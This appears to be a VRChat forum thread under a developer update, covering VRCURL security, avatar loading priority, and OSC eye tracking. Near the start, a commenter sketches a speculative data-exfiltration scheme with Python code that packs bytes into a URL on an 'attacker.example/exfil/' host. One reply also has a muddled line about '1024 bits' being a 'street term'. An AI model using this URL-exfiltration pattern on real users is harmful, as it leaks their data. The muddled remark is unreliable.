Developer Update - 2 March 2023

I am still intrigued to see how this security measure will hold up in the long run. I fully anticipate that someone will come up with some sort of data-requesting scheme that can still exfiltrate data in a reasonably effective way.

For example: an API endpoint that can take any string as a path, with all the possible strings generated locally as VRCURLs, encoded in something like Base64. That would let you map tons of binary data into text strings.

Even just 128 ASCII characters (in a URL) could encode up to 1024 binary digits. So even if the data isn’t necessarily identifying or sensitive, it could still be a LOT of data.
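As a rough sketch of what that encoding could look like (the endpoint and URL here are invented for illustration), URL-safe Base64 carries 6 bits per character, so a 128-character path segment holds 96 bytes, i.e. 768 bits, of arbitrary data:

```python
import base64

# Hypothetical exfiltration sketch: pack 96 raw bytes (768 bits) into a
# 128-character URL-safe Base64 path segment. The /exfil/ endpoint is made up.
payload = bytes(range(96))                          # arbitrary binary data
token = base64.urlsafe_b64encode(payload).decode()  # 6 bits per character
print(len(token))                                   # 128 characters
url = f"https://attacker.example/exfil/{token}"
```

(At a full 8 bits per character you’d get the 1024 figure above; Base64 trades 2 bits per character for staying URL-safe.)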

“1024 bits” is the street term for that.

Because you’ve mentioned Base64, I’m going to go with 24 bits of information: there are 16,777,216 (2^24) different values for 24 bits, so you’d need an array of about 16 million VRCURL entries. With Base64 you’d use four characters to represent three bytes of information.

I wonder how big an array can be handled at the moment. A ToS-friendly idea for this: a remote color picker. Let the user specify an RGB value and pass it to a script that returns a swatch, or a tinted picture. It’s a silly idea, but a good way to test 16 million VRCURLs.
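A minimal sketch of the mapping (the swatch endpoint is hypothetical): each of the 2^24 = 16,777,216 possible RGB values gets its own pre-generated URL, and Base64 spends four characters per three bytes:

```python
import base64

print(2 ** 24)                            # 16777216 possible 24-bit RGB values
print(base64.b64encode(b"\x01\x02\x03"))  # b'AQID': 4 Base64 chars per 3 bytes

def swatch_url(rgb: int) -> str:
    """One pre-generated VRCURL per 24-bit color (the path here is made up)."""
    return f"https://example.com/swatch/{rgb:06x}"

print(swatch_url(0xFF8800))  # https://example.com/swatch/ff8800
```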


So if I want to load friends first regardless of where they are, I can turn off near distance and leave only prioritization by friends, right?
In most of my use cases I need friends already loaded by the time I get close to them, so I usually wait at the entrance for a bit to give them time to load, because when I approach they might start reacting by waving or giving me headpats. I want to start interacting with them instantly, instead of awkwardly explaining that they’re still loading for me and I can’t see what they’re doing.

Yep! That’ll work too. Switch off distance and switch on friends: your friends will load first in size order, followed by everyone else in size order.
Generally though, if you’re on a decent connection and in an indoor scene, the 20-meter radius, followed by you finding them, will have them load in before you reach them; since they’re higher priority at that point, they’ll begin the moment they’re in range.
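Conceptually the ordering is just this (a toy sketch of the rule described above, not our actual code):

```python
# Toy model of the described priority: friends first, then by download size.
avatars = [
    {"name": "stranger",     "friend": False, "size_mb": 12},
    {"name": "big_friend",   "friend": True,  "size_mb": 40},
    {"name": "small_friend", "friend": True,  "size_mb": 8},
]
# False sorts before True, so `not friend` puts friends at the front;
# within each group, smaller avatars download first.
queue = sorted(avatars, key=lambda a: (not a["friend"], a["size_mb"]))
print([a["name"] for a in queue])  # ['small_friend', 'big_friend', 'stranger']
```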

My connection is okay, but the download speed from VRChat’s content servers is very unstable. On a good day it can be 10 megabytes per second, but occasionally it slows down to something like 0.5 megabytes per second (or even less). I think I’ve seen other people report it as a “slow download speed” bug.

OMG EYE TRACKING!!! YEAAAAAAAH!!! :smiley:


Hey, I was planning to publish an avatar for a friend; he set up a world and I wanted to contribute.
Apparently I can’t publish any avatars because I need to spend more time in VRChat, despite having been on for 2 years.

Got anything written under your bio? If it’s empty, set it to “i like swords” or something.

Is eye tracking gonna be a standalone-Quest-only feature again (like with hand tracking)?
HTC and Pico also have open SDKs for eye tracking, and it’s tiresome to make avatar setups for each of them every time.

Don’t forget about the OSC support for eye tracking.

So instead of a separate program setting custom avatar values, the authors of those programs will be able to update them to set the official VRChat avatar values.

Ahoy! That’s an amazing feature I’ve been waiting for, but what about the facial tracker and Pimax’s eye tracking module? How will things be for those? For now, eye tracking with Pimax and VRChat is honestly awful to set up and barely works, in addition to not having the same known parameters (at least the way I set it up).
And while you’re at it, you should add a camera path, aka keyframes, if you see what I mean. That would be amazing for videos and more!

We won’t be supporting face tracking just yet.

Notably, the difference in standards between most eye-tracking solutions is why we are not supporting each one natively. There is no agreed standard, and we do not want to implement and maintain every single variant of each company’s standard, so we left an interface open that allows full control over eye-look via OSC.

As docteh pointed out, there is no need for you to set up eye tracking parameters as long as you input the proper data into the OSC endpoints, and you have eye-look set up through the default avatar descriptor.
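For example, feeding gaze data in from a script could look something like this minimal sketch using the third-party python-osc library (the exact addresses shown are illustrative; see the OSC eye-tracking documentation for the authoritative list):

```python
from pythonosc.udp_client import SimpleUDPClient

# VRChat receives OSC on 127.0.0.1:9000 by default.
client = SimpleUDPClient("127.0.0.1", 9000)

# NOTE: these addresses are illustrative; verify them against the OSC docs.
# Combined gaze direction as pitch/yaw in degrees:
client.send_message("/tracking/eye/CenterPitchYaw", [5.0, -10.0])
# Eyelids: 0.0 = fully open, 1.0 = fully closed:
client.send_message("/tracking/eye/EyesClosedAmount", 0.2)
```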


Does this make setup easier for new avatars (or for editing existing ones), or does it also let you get eye tracking on existing avatars that have a “fake looking” setup, by controlling those parameters over OSC?

All avatars which have “Eye Look” set up should just work. It even respects the limits you have set for it! The current blinking system only provides a way to blink with both eyes, but as mentioned in the Dev Update, an SDK update will allow for having a blink blend shape per eye.


I’m not quite able to follow your post (sorry!) but as DrBlackRat and the OP note, if you have the built-in VRChat simulated eye movement set up, then the native eye tracking will work. All you have to do is use a Quest Pro in standalone mode, or send OSC data to the defined endpoints.

